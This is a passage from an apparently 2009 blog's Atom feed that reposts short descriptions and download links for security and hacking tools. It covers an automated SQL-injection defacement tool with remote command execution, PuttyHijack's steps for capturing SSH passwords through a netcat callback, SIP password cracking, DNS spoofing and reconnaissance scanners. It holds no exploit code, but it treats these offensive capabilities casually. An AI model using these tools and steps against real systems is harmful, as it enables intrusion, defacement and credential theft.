href='http://holly-donuts.blogspot.com/2009/01/browser-rider-web-browser-exploitation.html' title='Browser Rider - Web Browser Exploitation Framework'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-806061764984519555</id><published>2009-01-03T02:45:00.000-08:00</published><updated>2009-01-03T05:17:53.641-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='Scanner'/><title type='text'>ike-scan - IPsec VPN Scanning, Fingerprinting and Testing Tool</title><content type='html'>ike-scan - IPsec VPN Scanning, Fingerprinting and Testing Tool&lt;br /&gt;&lt;br /&gt;ike-scan is a command-line tool for discovering, fingerprinting and testing IPsec VPN systems. It constructs and sends IKE Phase-1 packets to the specified hosts, and displays any responses that are received.&lt;br /&gt;&lt;br /&gt;ike-scan allows you to:&lt;br /&gt;&lt;br /&gt;    * Send IKE packets to any number of destination hosts, using a configurable output bandwidth or packet rate. (This is useful for VPN detection, when you may need to scan large address spaces.)&lt;br /&gt;    * Construct the outgoing IKE packet in a flexible way. (This includes IKE packets which do not comply with the RFC requirements.)&lt;br /&gt;    * Decode and display any returned packets.&lt;br /&gt;    * Crack aggressive mode pre-shared keys. (You can use ike-scan to obtain the PSK hash data, and then use psk-crack to obtain the key.)&lt;br /&gt;&lt;br /&gt;You can read more in depth about ike-scan and how to use it - in the User Guide.&lt;br /&gt;&lt;br /&gt;ike-scan is free software, licensed under the GPL. It runs on Windows, Linux and most Unix systems. If you don’t already have ike-scan installed on your system, read the &lt;a href="http://www.nta-monitor.com/wiki/index.php/Ike-scan_Installation_Guide"&gt;installation guide.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You can download ike-scan 1.9 here:&lt;br /&gt;&lt;br /&gt;Source distribution: &lt;a href="http://www.nta-monitor.com/tools/ike-scan/download/ike-scan-1.9.tar.gz"&gt;ike-scan-1.9.tar.gz&lt;/a&gt;&lt;br /&gt;Windows binary: &lt;a href="http://www.nta-monitor.com/tools/ike-scan/download/ike-scan-win32-1.9.zip"&gt;ike-scan-win32-1.9.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nta-monitor.com/tools/ike-scan/archive/"&gt;Older versions of ike-scan&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.nta-monitor.com/tools/ike-scan/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-806061764984519555?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/806061764984519555/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/ike-scan-ipsec-vpn-scanning.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/806061764984519555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/806061764984519555'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/ike-scan-ipsec-vpn-scanning.html' title='ike-scan - IPsec VPN Scanning, Fingerprinting and Testing Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-919393162380633313</id><published>2009-01-03T02:43:00.000-08:00</published><updated>2009-01-03T05:23:07.344-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>MultiInjector - Automated Stealth SQL Injection Tool</title><content type='html'>MultiInjector - Automated Stealth SQL Injection Tool&lt;br /&gt;&lt;br /&gt;MultiInjector claims to the first configurable automatic website defacement software, I’m not sure if that’s a good thing - or a bad thing.&lt;br /&gt;&lt;br /&gt;But well here it is anyway.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;    * Receives a list of URLs as input&lt;br /&gt;    * Recognizes the parameterized URLs from the list&lt;br /&gt;    * Fuzzes all URL parameters to concatenate the desired payload once an injection is successful&lt;br /&gt;    * Automatic defacement - you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun&lt;br /&gt;    * OS command execution - remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user&lt;br /&gt;    * Configurable parallel connections exponentially speed up the attack process - one payload, multiple targets, simultaneous attacks&lt;br /&gt;    * Optional use of an HTTP proxy to mask the origin of the attacks&lt;br /&gt;&lt;br /&gt;The author highly recommend running a HTTP sniffer such as &lt;a href="http://www.ieinspector.com/httpanalyzer/"&gt;IEInspector HTTP Analyzer &lt;/a&gt;in order to see all attack requests going out to the targets.&lt;br /&gt;&lt;br /&gt;Requirements&lt;br /&gt;&lt;br /&gt;    * Python &gt;= 2.4&lt;br /&gt;    * Pycurl (compatible with the above version of Python)&lt;br /&gt;    * Psyco (compatible with the above version of Python)&lt;br /&gt;&lt;br /&gt;You can download MultiInjector v0.2 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sn3akers.com/downloads/MultiInjector.py"&gt;MultiInjector.py&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://chaptersinwebsecurity.blogspot.com/2008/10/multiinjector-released-automatic.html"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-919393162380633313?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/919393162380633313/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/multiinjector-automated-stealth-sql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/919393162380633313'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/919393162380633313'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/multiinjector-automated-stealth-sql.html' title='MultiInjector - Automated Stealth SQL Injection Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1225980299053317540</id><published>2009-01-03T02:42:00.000-08:00</published><updated>2009-01-03T05:24:55.896-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Gooscan - Automated Google Hacking Tool</title><content type='html'>Gooscan - Automated Google Hacking Tool&lt;br /&gt;&lt;br /&gt;Whilst reading an article the other day I saw this mentioned and realised I haven’t written about this yet either, although I have written about the similar tool Goolag.&lt;br /&gt;&lt;br /&gt;What is Gooscan?&lt;br /&gt;&lt;br /&gt;Gooscan is a tool that automates queries against Google search appliances, but with a twist. These particular queries are designed to find potential vulnerabilities on web pages. Think “cgi scanner” that never communicates directly with the target web server, since all queries are answered by a Google appliance, not by the target itself.&lt;br /&gt;&lt;br /&gt;Who is it written for?&lt;br /&gt;&lt;br /&gt;Security professionals: This tool serves as a front-end for an external web server assessment and aids in the “information gathering” phase of a vulnerability assessment.&lt;br /&gt;&lt;br /&gt;Web server administrators: This tool helps to discover what the web community may already know about you thanks to Google.&lt;br /&gt;&lt;br /&gt;Is this tool legal?&lt;br /&gt;&lt;br /&gt;From Google ToS - “You may not send automated queries of any sort to Google’s system without express permission in advance from Google.”&lt;br /&gt;&lt;br /&gt;This means that you should not use this tool to query Google without advance express permission. Google appliances, however, do not have these limitations. You should, however, obtain advance express permission from the owner or maintainer of the Google appliance before searching it with&lt;br /&gt;any automated tool for various legal and moral reasons.&lt;br /&gt;&lt;br /&gt;The author wrote this tool not to violate Google’s terms of service (ToS), but to raise the awareness of the web security community that a ToS may not discourage the bad guys from writing and running a tool like this for malicious purposes. To that end, only use this tool to query _appliances_ unless you are prepared to face the (as yet unquantified) wrath of Google.&lt;br /&gt;&lt;br /&gt;Why the proxy feature?&lt;br /&gt;&lt;br /&gt;Many companies can only reach the Internet by way of an internal proxy server. When conducting an authorized assessment, it may be necessary to bounce queries of of a web proxy instead of off the Google appliance directly.&lt;br /&gt;&lt;br /&gt;You can download Gooscan v1.0 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://johnny.ihackstuff.com/downloads/task,doc_download/gid,28/"&gt;Gooscan v1.0&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1225980299053317540?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1225980299053317540/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/gooscan-automated-google-hacking-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1225980299053317540'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1225980299053317540'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/gooscan-automated-google-hacking-tool.html' title='Gooscan - Automated Google Hacking Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6304228666091784255</id><published>2009-01-03T02:39:00.000-08:00</published><updated>2009-01-03T04:33:24.747-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Web-Harvest - Web Data Extraction Tool</title><content type='html'>Web-Harvest - Web Data Extraction Tool&lt;br /&gt;&lt;br /&gt;Web-Harvest is Open Source Web Data Extraction tool written in Java. It offers a way to collect desired Web pages and extract useful data from them. In order to do that, it leverages well established techniques and technologies for text/xml manipulation such as XSLT, XQuery and Regular Expressions. Web-Harvest mainly focuses on HTML/XML based web sites which still make vast majority of the Web content. On the other hand, it could be easily supplemented by custom Java libraries in order to augment its extraction capabilities.&lt;br /&gt;&lt;br /&gt;Process of extracting data from Web pages is also referred as Web Scraping or Web Data Mining. World Wide Web, as the largest database, often contains various data that we would like to consume for our needs. The problem is that this data is in most cases mixed together with formatting code - that way making human-friendly, but not machine-friendly content. Doing manual copy-paste is error prone, tedious and sometimes even impossible. Web software designers usually discuss how to make clean separation between content and style, using various frameworks and design patterns in order to achieve that. Anyway, some kind of merge occurs usually at the server side, so that the bunch of HTML is delivered to the web client.&lt;br /&gt;&lt;br /&gt;Every Web site and every Web page is composed using some logic. It is therefore needed to describe reverse process - how to fetch desired data from the mixed content. Every extraction procedure in Web-Harvest is user-defined through XML-based configuration files. Each configuration file describes sequence of processors executing some common task in order to accomplish the final goal. Processors execute in the form of pipeline. Thus, the output of one processor execution is input to another one. This can be best explained using the simple configuration fragment:&lt;br /&gt;&lt;br /&gt;&lt;xpath expression="//a[@shape='rect']/@href"&gt;&lt;br /&gt;    &lt;html-to-xml&gt;&lt;br /&gt;        &lt;http url="http://www.somesite.com/"/&gt;&lt;br /&gt;    &lt;/html-to-xml&gt;&lt;br /&gt;&lt;/xpath&gt;&lt;br /&gt;&lt;br /&gt;When Web-Harvest executes this part of configuration, the following steps occur:&lt;br /&gt;&lt;br /&gt;   1. http processor downloads content from the specified URL.&lt;br /&gt;   2. html-to-xml processor cleans up that HTML producing XHTML content.&lt;br /&gt;   3. xpath processor searches specific links in XHTML from previous step giving URL sequence as a result.&lt;br /&gt;&lt;br /&gt;Web-Harvest supports a set of useful processors for variable manipulation, conditional branching, looping, functions, file operations, HTML and XML processing, exception handling. See User manual for technical description of provided processors.&lt;br /&gt;&lt;br /&gt;You can download Web-Harvest 1.0 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://web-harvest.sourceforge.net/download/webharvest1-exe.zip"&gt;webharvest1-exe.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://web-harvest.sourceforge.net/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6304228666091784255?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6304228666091784255/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/web-harvest-web-data-extraction-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6304228666091784255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6304228666091784255'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/web-harvest-web-data-extraction-tool.html' title='Web-Harvest - Web Data Extraction Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-9104715247154386028</id><published>2009-01-03T02:38:00.000-08:00</published><updated>2009-01-03T05:24:15.780-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='Scanner'/><title type='text'>PorkBind v1.3 - Nameserver (DNS) Security Scanner</title><content type='html'>PorkBind v1.3 - Nameserver (DNS) Security Scanner&lt;br /&gt;&lt;br /&gt;This program retrieves version information for the nameservers of a domain and produces a report that describes possible vulnerabilities of each.&lt;br /&gt;&lt;br /&gt;Vulnerability information is configurable through a configuration file; the default is porkbind.conf. Each nameserver is tested for recursive queries and zone transfers. The code is parallelized with libpthread.&lt;br /&gt;&lt;br /&gt;Changes for v1.3&lt;br /&gt;&lt;br /&gt;    * Wrote in-a-bind shell script that scans random domain names from DMOZ&lt;br /&gt;    * Implemented recursive query testing&lt;br /&gt;    * Changed porkbind.conf to use CVE numbers in addition to CERT alerts&lt;br /&gt;    * Modified text displayed on stdout to make it more parsable&lt;br /&gt;    * Licensed with GNU Lesser General Public License&lt;br /&gt;    * Fixed timeout/concurrency/memory corruption bugs&lt;br /&gt;    * Fixed improper comparison of alpha/beta version numbering bug&lt;br /&gt;    * Added typecasts to silence compiler warnings&lt;br /&gt;&lt;br /&gt;The tool now scans for 14 flaws and reports CVE numbers &amp; CERT.&lt;br /&gt;&lt;br /&gt;You can download PorkBind v1.3 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.innu.org/~super/tools/porkbind-1.3.tar.gz"&gt;porkbind-1.3.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.innu.org/~super/tools/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-9104715247154386028?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/9104715247154386028/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/porkbind-v13-nameserver-dns-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/9104715247154386028'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/9104715247154386028'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/porkbind-v13-nameserver-dns-security.html' title='PorkBind v1.3 - Nameserver (DNS) Security Scanner'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-3003400451562738531</id><published>2009-01-03T02:37:00.000-08:00</published><updated>2009-01-03T05:25:07.623-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Putty'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows</title><content type='html'>PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows&lt;br /&gt;&lt;br /&gt;PuttyHijack is a POC tool that injects a dll into the PuTTY process to hijack an existing, or soon to be created, connection.&lt;br /&gt;&lt;br /&gt;This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a&lt;br /&gt;callback connection that is then used for input/output redirection.&lt;br /&gt;&lt;br /&gt;It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.&lt;br /&gt;&lt;br /&gt;Details&lt;br /&gt;&lt;br /&gt;1) Start a nc listener&lt;br /&gt;2) Run PuttyHijack specify the listener ip and port&lt;br /&gt;3) Watch the echoing of everything including passwords&lt;br /&gt;&lt;br /&gt;Some basic commands in this version include;&lt;br /&gt;&lt;br /&gt;!disco - disconnect the real putty from the display&lt;br /&gt;!reco - reconnect it&lt;br /&gt;!exit - just another way to exit the injected shell&lt;br /&gt;&lt;br /&gt;You can download PuttyHijack V1.0 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.insomniasec.com/tools/PuttyHijackV1.0.rar"&gt;PuttyHijackV1.0.rar&lt;/a&gt;&lt;br /&gt;Or read more &lt;a href="http://www.insomniasec.com/releases/tools"&gt;here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-3003400451562738531?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/3003400451562738531/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/puttyhijack-v10-hijack-sshputty.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3003400451562738531'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3003400451562738531'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/puttyhijack-v10-hijack-sshputty.html' title='PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1936737295790211764</id><published>2009-01-03T02:36:00.000-08:00</published><updated>2009-01-03T05:25:48.548-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='password cracking'/><title type='text'>SIPcrack - SIP Login Dumper &amp; Hash/Password Cracker</title><content type='html'>SIPcrack - SIP Login Dumper &amp; Hash/Password Cracker&lt;br /&gt;&lt;br /&gt;SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.&lt;br /&gt;&lt;br /&gt;The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.&lt;br /&gt;&lt;br /&gt;If you don’t have OpenSSL installed or encounter any building problems try ‘make no-openssl’ to build with integrated MD5 function (which is slower than the OpenSSL implementation).&lt;br /&gt;&lt;br /&gt;Usage&lt;br /&gt;&lt;br /&gt;Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. See ’sipdump -h’ for options.&lt;br /&gt;&lt;br /&gt;Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated See ’sipcrack -h’ for options.&lt;br /&gt;&lt;br /&gt;You can download SIPcrack here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.codito.de/prog/SIPcrack-0.3pre.tar.gz"&gt;SIPcrack-0.3pre.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.codito.de/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1936737295790211764?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1936737295790211764/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sipcrack-sip-login-dumper-hashpassword.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1936737295790211764'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1936737295790211764'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sipcrack-sip-login-dumper-hashpassword.html' title='SIPcrack - SIP Login Dumper &amp; Hash/Password Cracker'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-7151595167029860182</id><published>2009-01-03T02:35:00.000-08:00</published><updated>2009-01-03T05:26:02.246-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='spoofing'/><title type='text'>Zodiac - DNS Protocol Monitoring and Spoofing Tool</title><content type='html'>Zodiac - DNS Protocol Monitoring and Spoofing Tool&lt;br /&gt;&lt;br /&gt;Zodiac is a DNS protocol analyzation and exploitation program. It is a robust tool to explore the DNS protocol. Internally it contains advanced DNS routines for DNS packet construction and disassembling and is the optimal tool if you just want to try something out without undergoing the hassle to rewrite DNS packet routines or packet filtering.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;    * sniffing on all kinds of configured devices (Ethernet, PPP, …)&lt;br /&gt;    * capturing and decoding nearly all types of DNS packets, including packet decompression&lt;br /&gt;    * ncurses driven text based frontend with interactive commandline and multiple windows&lt;br /&gt;    * threaded design allow more flexibility when adding your own features&lt;br /&gt;    * clean code, commented and tested just fine, ready for you to extend&lt;br /&gt;    * internal DNS packet filtering allows installation of pseudo DNS filters you can “select()” on a large set of DNS packet construction primitives&lt;br /&gt;    * DNS name server versioning using BIND version requests&lt;br /&gt;    * DNS local spoofing, answering DNS queries on your LAN before the remote NS&lt;br /&gt;    * DNS jizz spoofing, exploiting a weakness within old BIND versions&lt;br /&gt;    * DNS ID spoofing, exploiting a weakness within the DNS protocol itself&lt;br /&gt;&lt;br /&gt;You can download Zodiac 0.4.9 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.packetfactory.net/projects/zodiac/zodiac-0.4.9.tar.gz"&gt;zodiac-0.4.9.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.packetfactory.net/projects/zodiac/"&gt;here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-7151595167029860182?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/7151595167029860182/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/zodiac-dns-protocol-monitoring-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7151595167029860182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7151595167029860182'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/zodiac-dns-protocol-monitoring-and.html' title='Zodiac - DNS Protocol Monitoring and Spoofing Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4333283333984173258</id><published>2009-01-03T02:33:00.000-08:00</published><updated>2009-01-03T04:34:55.836-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>DNSenum - Domain Information Gathering Tool</title><content type='html'>DNSenum - Domain Information Gathering Tool&lt;br /&gt;&lt;br /&gt;The first stage of penetration testing is usually passive information gathering and enumeration (active information gathering). This is where tools like dnsenum come in, the purpose of DNSenum is to gather as much information as possible about a domain.&lt;br /&gt;&lt;br /&gt;The program currently performs the following operations:&lt;br /&gt;&lt;br /&gt;   1. Get the host’s addresse (A record).&lt;br /&gt;   2. Get the namservers (threaded).&lt;br /&gt;   3. Get the MX record (threaded).&lt;br /&gt;   4. Perform axfr queries on nameservers (threaded).&lt;br /&gt;   5. Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).&lt;br /&gt;   6. Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).&lt;br /&gt;   7. Calculate C class domain network ranges and perform whois queries on them (threaded).&lt;br /&gt;   8. Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).&lt;br /&gt;   9. Write to domain_ips.txt file ip-blocks.&lt;br /&gt;&lt;br /&gt;The output file domain_ips.txt will contain non-contiguous IP blocks:&lt;br /&gt;&lt;br /&gt;127.0.0.1/32&lt;br /&gt;127.0.0.8/31&lt;br /&gt;&lt;br /&gt;You can download DNSenum v1.2 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz"&gt;dnsenum1.2.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or you can read more &lt;a href="http://code.google.com/p/dnsenum/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4333283333984173258?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4333283333984173258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/dnsenum-domain-information-gathering.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4333283333984173258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4333283333984173258'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/dnsenum-domain-information-gathering.html' title='DNSenum - Domain Information Gathering Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 